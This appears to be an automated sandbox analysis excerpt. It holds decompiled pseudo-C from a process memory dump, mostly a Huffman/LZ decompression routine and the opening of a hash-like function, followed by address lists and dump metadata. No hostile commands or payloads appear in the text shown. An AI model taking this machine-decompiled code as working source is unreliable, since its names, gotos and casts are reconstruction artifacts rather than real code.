    													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
    													_t675 = _t677 + _t404;
    													_t529 = _t404 + _t630;
    													 *(_t691 + 0x24) = _t529;
    													 *(_t663 + 0x7c) = _t630 + _t498;
    													__eflags =  *(_t691 + 0x1c) - _t498;
    													if( *(_t691 + 0x1c) >= _t498) {
    														__eflags = _t498 - 8;
    														if(_t498 < 8) {
    															goto L85;
    														}
    														_t407 = _t498 >> 3;
    														__eflags = _t407;
    														_t660 = _t407;
    														do {
    															E0084EA80(_t529, _t675, 8);
    															_t545 =  *((intOrPtr*)(_t691 + 0x30));
    															_t691 = _t691 + 0xc;
    															_t529 = _t545 + 8;
    															_t675 = _t675 + 8;
    															_t498 = _t498 - 8;
    															 *(_t691 + 0x24) = _t529;
    															_t660 = _t660 - 1;
    															__eflags = _t660;
    														} while (_t660 != 0);
    														goto L84;
    													}
    													__eflags = _t498 - 8;
    													if(_t498 < 8) {
    														goto L85;
    													}
    													_t633 = _t498 >> 3;
    													__eflags = _t633;
    													do {
    														_t498 = _t498 - 8;
    														 *_t529 =  *_t675;
    														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
    														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
    														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
    														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
    														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
    														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
    														_t416 =  *((intOrPtr*)(_t675 + 7));
    														_t675 = _t675 + 8;
    														 *((char*)(_t529 + 7)) = _t416;
    														_t529 = _t529 + 8;
    														_t633 = _t633 - 1;
    														__eflags = _t633;
    													} while (_t633 != 0);
    													goto L85;
    												}
    												_push(_t691 + 0x28);
    												_t417 = E008435D7(_t663, _t347);
    												__eflags = _t417;
    												if(_t417 == 0) {
    													goto L100;
    												}
    												_t420 = E00841A81(_t663, _t691 + 0x28);
    												__eflags = _t420;
    												if(_t420 != 0) {
    													goto L33;
    												}
    												goto L100;
    											}
    											_t501 = _t619 - 0x106;
    											__eflags = _t501 - 8;
    											if(_t501 >= 8) {
    												_t680 = (_t501 >> 2) - 1;
    												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
    												__eflags = _t501;
    											} else {
    												_t680 = 0;
    											}
    											_t498 = _t501 + 2;
    											__eflags = _t680;
    											if(_t680 == 0) {
    												_t681 = _t654 + 4;
    											} else {
    												_t472 = E0083A591(_t347);
    												_t600 = 0x10;
    												_t498 = _t498 + (_t472 >> _t600 - _t680);
    												_t603 =  *(_t654 + 8) + _t680;
    												_t681 = _t654 + 4;
    												 *_t681 =  *_t681 + (_t603 >> 3);
    												 *(_t681 + 4) = _t603 & 0x00000007;
    											}
    											_t421 = E0083A591(_t681);
    											_t422 =  *(_t654 + 0xfa0);
    											_t635 = _t421 & 0x0000fffe;
    											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
    											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
    												_t682 = 0xf;
    												_t423 = _t422 + 1;
    												__eflags = _t423 - _t682;
    												if(_t423 >= _t682) {
    													L49:
    													_t552 =  *(_t654 + 8) + _t682;
    													 *(_t654 + 8) = _t552 & 0x00000007;
    													_t425 = _t552 >> 3;
    													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
    													_t554 = 0x10;
    													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
    													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
    													asm("sbb eax, eax");
    													_t426 = _t425 & _t557;
    													__eflags = _t426;
    													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
    													goto L50;
    												}
    												_t593 = _t654 + (_t423 + 0x3c8) * 4;
    												while(1) {
    													__eflags = _t635 -  *_t593;
    													if(_t635 <  *_t593) {
    														break;
    													}
    													_t423 = _t423 + 1;
    													_t593 = _t593 + 4;
    													__eflags = _t423 - 0xf;
    													if(_t423 < 0xf) {
    														continue;
    													}
    													goto L49;
    												}
    												_t682 = _t423;
    												goto L49;
    											} else {
    												_t594 = 0x10;
    												_t652 = _t635 >> _t594 - _t422;
    												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
    												 *_t681 =  *_t681 + (_t597 >> 3);
    												 *(_t681 + 4) = _t597 & 0x00000007;
    												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
    												L50:
    												_t638 = _t427 & 0x0000ffff;
    												__eflags = _t638 - 4;
    												if(_t638 >= 4) {
    													_t430 = (_t638 >> 1) - 1;
    													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
    													__eflags = _t638;
    												} else {
    													_t430 = 0;
    												}
    												 *(_t691 + 0x18) = _t430;
    												_t559 = _t638 + 1;
    												 *(_t691 + 0x24) = _t559;
    												_t683 = _t559;
    												 *(_t691 + 0x1c) = _t683;
    												__eflags = _t430;
    												if(_t430 == 0) {
    													L70:
    													__eflags = _t683 - 0x100;
    													if(_t683 > 0x100) {
    														_t498 = _t498 + 1;
    														__eflags = _t683 - 0x2000;
    														if(_t683 > 0x2000) {
    															_t498 = _t498 + 1;
    															__eflags = _t683 - 0x40000;
    															if(_t683 > 0x40000) {
    																_t498 = _t498 + 1;
    																__eflags = _t498;
    															}
    														}
    													}
    													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
    													 *(_t663 + 0x68) =  *(_t663 + 0x64);
    													 *(_t663 + 0x64) =  *(_t663 + 0x60);
    													 *(_t663 + 0x60) = _t683;
    													_t641 =  *(_t663 + 0x7c);
    													_t561 = _t641 - _t683;
    													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
    													 *(_t663 + 0x74) = _t498;
    													 *(_t691 + 0x24) = _t561;
    													__eflags = _t561 - _t435;
    													if(_t561 >= _t435) {
    														L93:
    														_t666 =  *((intOrPtr*)(_t691 + 0x14));
    														_t347 = _t654 + 4;
    														__eflags = _t498;
    														if(_t498 == 0) {
    															goto L23;
    														}
    														_t684 =  *(_t663 + 0xe6dc);
    														_t661 =  *(_t691 + 0x24);
    														do {
    															_t685 = _t684 & _t661;
    															_t661 = _t661 + 1;
    															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
    															_t684 =  *(_t663 + 0xe6dc);
    															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
    															_t498 = _t498 - 1;
    															__eflags = _t498;
    														} while (_t498 != 0);
    														goto L150;
    													} else {
    														__eflags = _t641 - _t435;
    														if(_t641 >= _t435) {
    															goto L93;
    														}
    														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
    														_t675 = _t440 + _t561;
    														_t529 = _t440 + _t641;
    														 *(_t691 + 0x24) = _t529;
    														 *(_t663 + 0x7c) = _t641 + _t498;
    														__eflags =  *(_t691 + 0x1c) - _t498;
    														if( *(_t691 + 0x1c) >= _t498) {
    															__eflags = _t498 - 8;
    															if(_t498 < 8) {
    																goto L85;
    															}
    															_t443 = _t498 >> 3;
    															__eflags = _t443;
    															 *(_t691 + 0x1c) = _t443;
    															_t662 = _t443;
    															do {
    																E0084EA80(_t529, _t675, 8);
    																_t563 =  *((intOrPtr*)(_t691 + 0x30));
    																_t691 = _t691 + 0xc;
    																_t529 = _t563 + 8;
    																_t675 = _t675 + 8;
    																_t498 = _t498 - 8;
    																 *(_t691 + 0x24) = _t529;
    																_t662 = _t662 - 1;
    																__eflags = _t662;
    															} while (_t662 != 0);
    															goto L84;
    														}
    														__eflags = _t498 - 8;
    														if(_t498 < 8) {
    															goto L85;
    														}
    														_t644 = _t498 >> 3;
    														__eflags = _t644;
    														do {
    															_t498 = _t498 - 8;
    															 *_t529 =  *_t675;
    															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
    															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
    															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
    															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
    															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
    															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
    															_t452 =  *((intOrPtr*)(_t675 + 7));
    															_t675 = _t675 + 8;
    															 *((char*)(_t529 + 7)) = _t452;
    															_t529 = _t529 + 8;
    															_t644 = _t644 - 1;
    															__eflags = _t644;
    														} while (_t644 != 0);
    														goto L85;
    													}
    												} else {
    													__eflags = _t430 - 4;
    													if(__eflags < 0) {
    														_t453 = E00847DE9(_t654 + 4);
    														_t565 = 0x20;
    														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
    														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
    														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
    														_t569 = _t568 & 0x00000007;
    														__eflags = _t569;
    														 *(_t654 + 8) = _t569;
    														L69:
    														 *(_t691 + 0x1c) = _t683;
    														goto L70;
    													}
    													if(__eflags <= 0) {
    														_t645 = _t654 + 4;
    													} else {
    														_t467 = E00847DE9(_t654 + 4);
    														_t651 =  *(_t691 + 0x18);
    														_t587 = 0x24;
    														_t590 = _t651 - 4 +  *(_t654 + 8);
    														_t645 = _t654 + 4;
    														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
    														 *_t645 =  *_t645 + (_t590 >> 3);
    														 *(_t645 + 4) = _t590 & 0x00000007;
    													}
    													_t456 = E0083A591(_t645);
    													_t457 =  *(_t654 + 0x1e8c);
    													_t647 = _t456 & 0x0000fffe;
    													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
    													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
    														_t571 = 0xf;
    														_t458 = _t457 + 1;
    														 *(_t691 + 0x18) = _t571;
    														__eflags = _t458 - _t571;
    														if(_t458 >= _t571) {
    															L66:
    															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
    															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
    															_t461 =  *(_t691 + 0x18);
    															 *(_t654 + 8) = _t573 & 0x00000007;
    															_t575 = 0x10;
    															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
    															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
    															asm("sbb eax, eax");
    															_t462 = _t461 & _t578;
    															__eflags = _t462;
    															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
    															goto L67;
    														}
    														_t580 = _t654 + (_t458 + 0x783) * 4;
    														while(1) {
    															__eflags = _t647 -  *_t580;
    															if(_t647 <  *_t580) {
    																break;
    															}
    															_t458 = _t458 + 1;
    															_t580 = _t580 + 4;
    															__eflags = _t458 - 0xf;
    															if(_t458 < 0xf) {
    																continue;
    															}
    															goto L66;
    														}
    														 *(_t691 + 0x18) = _t458;
    														goto L66;
    													} else {
    														_t581 = 0x10;
    														_t650 = _t647 >> _t581 - _t457;
    														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
    														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
    														 *(_t654 + 8) = _t584 & 0x00000007;
    														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
    														L67:
    														_t683 = _t683 + (_t463 & 0x0000ffff);
    														goto L69;
    													}
    												}
    											}
    										}
    										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
    										_t69 = _t663 + 0x7c;
    										 *_t69 =  *(_t663 + 0x7c) + 1;
    										__eflags =  *_t69;
    										goto L33;
    									}
    									_t607 = _t654 + (_t353 + 0xd) * 4;
    									while(1) {
    										__eflags = _t616 -  *_t607;
    										if(_t616 <  *_t607) {
    											break;
    										}
    										_t353 = _t353 + 1;
    										_t607 = _t607 + 4;
    										__eflags = _t353 - 0xf;
    										if(_t353 < 0xf) {
    											continue;
    										}
    										goto L30;
    									}
    									_t490 = _t353;
    									goto L30;
    								}
    								_t608 = 0x10;
    								_t653 = _t616 >> _t608 - _t352;
    								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
    								 *_t667 =  *_t667 + (_t611 >> 3);
    								_t347 = _t654 + 4;
    								 *(_t347 + 4) = _t611 & 0x00000007;
    								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
    								goto L31;
    							}
    							__eflags = _t507 -  *(_t663 + 0x7c);
    							if(_t507 ==  *(_t663 + 0x7c)) {
    								goto L21;
    							}
    							E0084484D(_t663);
    							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
    							if(__eflags > 0) {
    								L152:
    								_t418 = 0;
    								goto L101;
    							}
    							if(__eflags < 0) {
    								goto L21;
    							}
    							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
    							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
    								goto L152;
    							}
    							goto L21;
    						}
    					}
    				}
    				 *((char*)(_t654 + 0x2c)) = 1;
    				_push(_t654 + 0x30);
    				_push(_t654 + 0x18);
    				_push(_t654 + 4);
    				if(E008439F2(__ecx) != 0) {
    					goto L3;
    				}
    				goto L2;
    			}


















































































































































    0x00846d53
    0x00846d57
    0x00846d5d
    0x00846d86
    0x00846d89
    0x00846d8e
    0x00846d91
    0x00846d78
    0x00846d78
    0x00000000
    0x00846d93
    0x00846d9e
    0x00846da1
    0x00846da4
    0x00846da8
    0x00846dac
    0x00846db0
    0x00846db2
    0x00846db4
    0x00846db4
    0x00846db8
    0x00846dc5
    0x00846dc5
    0x00846dcb
    0x00846dce
    0x00846dd0
    0x00846dd4
    0x00000000
    0x00000000
    0x00846dd6
    0x00846dd6
    0x00846dd8
    0x00847363
    0x00847363
    0x00847365
    0x00000000
    0x00847366
    0x00846dde
    0x00846dec
    0x00846dec
    0x00846dee
    0x00846dfd
    0x00846dfd
    0x00846e03
    0x008476b2
    0x008476b2
    0x00000000
    0x008476b2
    0x00000000
    0x00846e03
    0x00846df0
    0x00846df7
    0x00000000
    0x00000000
    0x00000000
    0x00846df7
    0x00846de3
    0x00846de6
    0x00000000
    0x00000000
    0x00000000
    0x00846e09
    0x00846e09
    0x00846e16
    0x00846e1b
    0x00846e4f
    0x00846e4f
    0x00846e54
    0x00846e5b
    0x00846e61
    0x00846e67
    0x00846e6b
    0x00846ea5
    0x00846ea6
    0x00846ea7
    0x00846ea9
    0x00846ec2
    0x00846ec5
    0x00846ecc
    0x00846ecf
    0x00846ed2
    0x00846edb
    0x00846ee4
    0x00846ee6
    0x00846ee9
    0x00846eeb
    0x00846eeb
    0x00846eed
    0x00846ef5
    0x00846ef8
    0x00846efd
    0x00846eff
    0x00846f18
    0x00846f1e
    0x0084733a
    0x0084733c
    0x0084736f
    0x00847375
    0x00847491
    0x00847491
    0x0084749a
    0x0084749d
    0x0084749f
    0x008474a3
    0x008474b2
    0x008474b2
    0x008474b5
    0x008474ba
    0x008474c1
    0x008474c7
    0x008474cd
    0x008474d4
    0x00847502
    0x00847503
    0x00847504
    0x00847506
    0x00847522
    0x00847525
    0x0084752c
    0x0084752f
    0x00847532
    0x0084753e
    0x0084754a
    0x0084754c
    0x00847552
    0x00847554
    0x00847554
    0x00847556
    0x0084755e
    0x0084755e
    0x00847561
    0x00847564
    0x00847575
    0x00847578
    0x00847578
    0x00847566
    0x00847566
    0x00847566
    0x0084757a
    0x0084757d
    0x0084757f
    0x00847584
    0x0084758b
    0x00847593
    0x00847595
    0x0084759c
    0x0084759f
    0x0084759f
    0x008475a2
    0x008475a2
    0x008475a5
    0x008475b0
    0x008475b4
    0x008475b9
    0x008475bc
    0x008475be
    0x00847672
    0x00847672
    0x00847675
    0x00847677
    0x00000000
    0x00000000
    0x0084767d
    0x00847683
    0x00847689
    0x0084768e
    0x00847692
    0x00847698
    0x008476a1
    0x008476a4
    0x008476a4
    0x008476a4
    0x008476a9
    0x008476a9
    0x00846f10
    0x00846f10
    0x00000000
    0x008475c4
    0x008475c4
    0x008475c6
    0x00000000
    0x00000000
    0x008475cc
    0x008475d2
    0x008475d4
    0x008475da
    0x008475de
    0x008475e1
    0x008475e5
    0x00847637
    0x0084763a
    0x0084726e
    0x0084726e
    0x00847271
    0x00847273
    0x00846dbd
    0x00846dc1
    0x00846dc1
    0x00846dc5
    0x00846dc5
    0x00846dcb
    0x00846dce
    0x00846dd0
    0x00846dd4
    0x00000000
    0x00000000
    0x00000000
    0x00846dd4
    0x00846dc5
    0x0084727c
    0x0084727e
    0x00847281
    0x00847284
    0x00000000
    0x00000000
    0x0084728d
    0x00847290
    0x00847293
    0x00847296
    0x00000000
    0x00000000
    0x0084729f
    0x008472a2
    0x008472a5
    0x008472a8
    0x00000000
    0x00000000
    0x008472b1
    0x008472b4
    0x008472b7
    0x008472ba
    0x00000000
    0x00000000
    0x008472c3
    0x008472c6
    0x008472c9
    0x008472cc
    0x00000000
    0x00000000
    0x008472d5
    0x008472d8
    0x008472dc
    0x008472df
    0x008472e2
    0x008472eb
    0x008472ee
    0x008472ee
    0x00000000
    0x008472e2
    0x00847642
    0x00847642
    0x00847645
    0x00847649
    0x0084764b
    0x0084764f
    0x00847654
    0x00847658
    0x0084765b
    0x0084765e
    0x00847661
    0x00847664
    0x00847668
    0x00847668
    0x00847668
    0x0084726a
    0x0084726a
    0x00000000
    0x0084726a
    0x008475e7
    0x008475ea
    0x00000000
    0x00000000
    0x008475f2
    0x008475f2
    0x008475f5
    0x008475f8
    0x008475fb
    0x00847600
    0x00847606
    0x0084760c
    0x00847612
    0x00847618
    0x0084761e
    0x00847621
    0x00847624
    0x00847627
    0x0084762a
    0x0084762d
    0x0084762d
    0x0084762d
    0x00000000
    0x00847632
    0x008475be
    0x0084750e
    0x00847511
    0x00847511
    0x00847513
    0x00000000
    0x00000000
    0x00847515
    0x00847516
    0x00847519
    0x0084751c
    0x00000000
    0x00000000
    0x00000000
    0x0084751e
    0x00847520
    0x00000000
    0x00847520
    0x008474d8
    0x008474db
    0x008474e5
    0x008474ed
    0x008474f3
    0x008474f6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x008474a5
    0x008474a5
    0x008474a8
    0x008474aa
    0x008474ad
    0x008474ad
    0x008474ad
    0x00000000
    0x008474a5
    0x0084737b
    0x0084737e
    0x00847382
    0x00847384
    0x00846e9a
    0x00846e9a
    0x00000000
    0x00846e9a
    0x0084738a
    0x0084738d
    0x00847392
    0x00847394
    0x0084739e
    0x008473a3
    0x008473a5
    0x00847455
    0x00847455
    0x00847458
    0x0084745a
    0x00000000
    0x00000000
    0x00847460
    0x00847466
    0x0084746c
    0x00847471
    0x00847475
    0x0084747b
    0x00847484
    0x00847487
    0x00847487
    0x00847487
    0x00000000
    0x0084748c
    0x008473ab
    0x008473ad
    0x00000000
    0x00000000
    0x008473b3
    0x008473b9
    0x008473bb
    0x008473c1
    0x008473c5
    0x008473c8
    0x008473cc
    0x0084741e
    0x00847421
    0x00000000
    0x00000000
    0x00847429
    0x00847429
    0x0084742c
    0x0084742e
    0x00847432
    0x00847437
    0x0084743b
    0x0084743e
    0x00847441
    0x00847444
    0x00847447
    0x0084744b
    0x0084744b
    0x0084744b
    0x00000000
    0x00847450
    0x008473ce
    0x008473d1
    0x00000000
    0x00000000
    0x008473d9
    0x008473d9
    0x008473dc
    0x008473df
    0x008473e2
    0x008473e7
    0x008473ed
    0x008473f3
    0x008473f9
    0x008473ff
    0x00847405
    0x00847408
    0x0084740b
    0x0084740e
    0x00847411
    0x00847414
    0x00847414
    0x00847414
    0x00000000
    0x00847419
    0x00847342
    0x00847346
    0x0084734b
    0x0084734d
    0x00000000
    0x00000000
    0x00847356
    0x0084735b
    0x0084735d
    0x00000000
    0x00000000
    0x00000000
    0x0084735d
    0x00846f24
    0x00846f2a
    0x00846f2d
    0x00846f3e
    0x00846f41
    0x00846f41
    0x00846f2f
    0x00846f2f
    0x00846f2f
    0x00846f43
    0x00846f46
    0x00846f48
    0x00846f72
    0x00846f4a
    0x00846f4c
    0x00846f53
    0x00846f5b
    0x00846f5d
    0x00846f5f
    0x00846f67
    0x00846f6d
    0x00846f6d
    0x00846f77
    0x00846f7e
    0x00846f84
    0x00846f8a
    0x00846f91
    0x00846fbf
    0x00846fc0
    0x00846fc1
    0x00846fc3
    0x00846fdf
    0x00846fe2
    0x00846fe9
    0x00846fec
    0x00846fef
    0x00846ffb
    0x00847007
    0x00847009
    0x0084700f
    0x00847011
    0x00847011
    0x00847013
    0x00000000
    0x00847013
    0x00846fcb
    0x00846fce
    0x00846fce
    0x00846fd0
    0x00000000
    0x00000000
    0x00846fd2
    0x00846fd3
    0x00846fd6
    0x00846fd9
    0x00000000
    0x00000000
    0x00000000
    0x00846fdb
    0x00846fdd
    0x00000000
    0x00846f93
    0x00846f95
    0x00846f98
    0x00846fa2
    0x00846faa
    0x00846fb0
    0x00846fb3
    0x0084701b
    0x0084701b
    0x0084701e
    0x00847021
    0x00847031
    0x00847034
    0x00847034
    0x00847023
    0x00847023
    0x00847023
    0x00847036
    0x0084703a
    0x0084703d
    0x00847041
    0x00847043
    0x00847047
    0x00847049
    0x0084717a
    0x0084717a
    0x00847180
    0x00847182
    0x00847183
    0x00847189
    0x0084718b
    0x0084718c
    0x00847192
    0x00847194
    0x00847194
    0x00847194
    0x00847192
    0x00847189
    0x00847198
    0x0084719e
    0x008471a4
    0x008471a7
    0x008471aa
    0x008471b5
    0x008471b7
    0x008471bc
    0x008471bf
    0x008471c3
    0x008471c5
    0x008472f6
    0x008472f6
    0x008472fa
    0x008472fd
    0x008472ff
    0x00000000
    0x00000000
    0x00847305
    0x0084730b
    0x0084730f
    0x00847315
    0x0084731a
    0x0084731e
    0x00847324
    0x0084732d
    0x00847330
    0x00847330
    0x00847330
    0x00000000
    0x008471cb
    0x008471cb
    0x008471cd
    0x00000000
    0x00000000
    0x008471d3
    0x008471d9
    0x008471dc
    0x008471e2
    0x008471e6
    0x008471e9
    0x008471ed
    0x00847238
    0x0084723b
    0x00000000
    0x00000000
    0x0084723f
    0x0084723f
    0x00847242
    0x00847246
    0x00847248
    0x0084724c
    0x00847251
    0x00847255
    0x00847258
    0x0084725b
    0x0084725e
    0x00847261
    0x00847265
    0x00847265
    0x00847265
    0x00000000
    0x00847248
    0x008471ef
    0x008471f2
    0x00000000
    0x00000000
    0x008471f6
    0x008471f6
    0x008471f9
    0x008471fc
    0x008471ff
    0x00847204
    0x0084720a
    0x00847210
    0x00847216
    0x0084721c
    0x00847222
    0x00847225
    0x00847228
    0x0084722b
    0x0084722e
    0x00847231
    0x00847231
    0x00847231
    0x00000000
    0x00847236
    0x0084704f
    0x0084704f
    0x00847052
    0x0084714d
    0x00847156
    0x00847160
    0x00847164
    0x0084716d
    0x00847170
    0x00847170
    0x00847173
    0x00847176
    0x00847176
    0x00000000
    0x00847176
    0x00847058
    0x0084708e
    0x0084705a
    0x0084705d
    0x00847062
    0x0084706a
    0x00847072
    0x00847075
    0x0084707d
    0x00847084
    0x00847089
    0x00847089
    0x00847093
    0x0084709a
    0x008470a0
    0x008470a6
    0x008470ad
    0x008470db
    0x008470dc
    0x008470dd
    0x008470e1
    0x008470e3
    0x00847101
    0x00847104
    0x00847110
    0x00847113
    0x00847117
    0x0084711c
    0x0084712f
    0x00847131
    0x00847137
    0x00847139
    0x00847139
    0x0084713b
    0x00000000
    0x0084713b
    0x008470eb
    0x008470ee
    0x008470ee
    0x008470f0
    0x00000000
    0x00000000
    0x008470f2
    0x008470f3
    0x008470f6
    0x008470f9
    0x00000000
    0x00000000
    0x00000000
    0x008470fb
    0x008470fd
    0x00000000
    0x008470af
    0x008470b1
    0x008470b4
    0x008470be
    0x008470c6
    0x008470cc
    0x008470cf
    0x00847143
    0x00847146
    0x00000000
    0x00847146
    0x008470ad
    0x00847049
    0x00846f91
    0x00846f0a
    0x00846f0d
    0x00846f0d
    0x00846f0d
    0x00000000
    0x00846f0d
    0x00846eae
    0x00846eb1
    0x00846eb1
    0x00846eb3
    0x00000000
    0x00000000
    0x00846eb5
    0x00846eb6
    0x00846eb9
    0x00846ebc
    0x00000000
    0x00000000
    0x00000000
    0x00846ebe
    0x00846ec0
    0x00000000
    0x00846ec0
    0x00846e6f
    0x00846e72
    0x00846e7c
    0x00846e84
    0x00846e8a
    0x00846e8d
    0x00846e90
    0x00000000
    0x00846e90
    0x00846e1d
    0x00846e20
    0x00000000
    0x00000000
    0x00846e24
    0x00846e2f
    0x00846e35
    0x008476be
    0x008476be
    0x00000000
    0x008476be
    0x00846e3b
    0x00000000
    0x00000000
    0x00846e43
    0x00846e49
    0x00000000
    0x00000000
    0x00000000
    0x00846e49
    0x00846dc5
    0x00846d91
    0x00846d62
    0x00846d66
    0x00846d6a
    0x00846d6e
    0x00846d76
    0x00000000
    0x00000000
    0x00000000

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d204a15e14b19437cab768b3a6b31c5e993296c43b6ba085a93268bb79c39083
    • Instruction ID: 42634597d553a1e97e3edd5126893d0aba7e69b307ce6b4636ed60267ab2d516
    • Opcode Fuzzy Hash: d204a15e14b19437cab768b3a6b31c5e993296c43b6ba085a93268bb79c39083
    • Instruction Fuzzy Hash: 9262017060874E9FC719CF28C8905A9FBE1FB55308F14866EE896CB742E731E965CB81
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E0083E9A9(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
    				signed int _v4;
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int* _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _t429;
    				intOrPtr _t431;
    				intOrPtr _t436;
    				void* _t441;
    				intOrPtr _t443;
    				signed int _t446;
    				void* _t448;
    				signed int _t454;
    				signed int _t460;
    				signed int _t466;
    				signed int _t474;
    				signed int _t482;
    				signed int _t489;
    				signed int _t512;
    				signed int _t519;
    				signed int _t526;
    				signed int _t546;
    				signed int _t555;
    				signed int _t564;
    				signed int* _t592;
    				signed int _t593;
    				signed int _t595;
    				signed int _t596;
    				signed int* _t597;
    				signed int _t598;
    				signed int _t599;
    				signed int _t601;
    				signed int _t603;
    				signed int _t604;
    				signed int* _t605;
    				signed int _t606;
    				signed int* _t670;
    				signed int* _t741;
    				signed int _t752;
    				signed int _t769;
    				signed int _t773;
    				signed int _t777;
    				signed int _t781;
    				signed int _t782;
    				signed int _t786;
    				signed int _t787;
    				signed int _t791;
    				signed int _t796;
    				signed int _t800;
    				signed int _t804;
    				signed int _t806;
    				signed int _t809;
    				signed int _t810;
    				signed int* _t811;
    				signed int _t814;
    				signed int _t815;
    				signed int _t816;
    				signed int _t820;
    				signed int _t821;
    				signed int _t825;
    				signed int _t830;
    				signed int _t834;
    				signed int _t838;
    				signed int* _t839;
    				signed int _t841;
    				signed int _t842;
    				signed int _t844;
    				signed int _t845;
    				signed int _t847;
    				signed int* _t848;
    				signed int _t851;
    				signed int* _t854;
    				signed int _t855;
    				signed int _t857;
    				signed int _t858;
    				signed int _t862;
    				signed int _t863;
    				signed int _t867;
    				signed int _t871;
    				signed int _t875;
    				signed int _t879;
    				signed int _t880;
    				signed int* _t881;
    				signed int _t882;
    				signed int _t884;
    				signed int _t885;
    				signed int _t886;
    				signed int _t887;
    				signed int _t888;
    				signed int _t890;
    				signed int _t891;
    				signed int _t893;
    				signed int _t894;
    				signed int _t896;
    				signed int _t897;
    				signed int* _t898;
    				signed int _t899;
    				signed int _t901;
    				signed int _t902;
    				signed int _t904;
    				signed int _t905;
    
    				_t906 =  &_v28;
    				if(_a16 == 0) {
    					_t839 = _a8;
    					_v20 = _t839;
    					E0084EA80(_t839, _a12, 0x40);
    					_t906 =  &(( &_v28)[3]);
    				} else {
    					_t839 = _a12;
    					_v20 = _t839;
    				}
    				_t848 = _a4;
    				_t593 =  *_t848;
    				_t886 = _t848[1];
    				_a12 = _t848[2];
    				_a16 = _t848[3];
    				_v24 = 0;
    				_t429 = E00855644( *_t839);
    				asm("rol edx, 0x5");
    				 *_t839 = _t429;
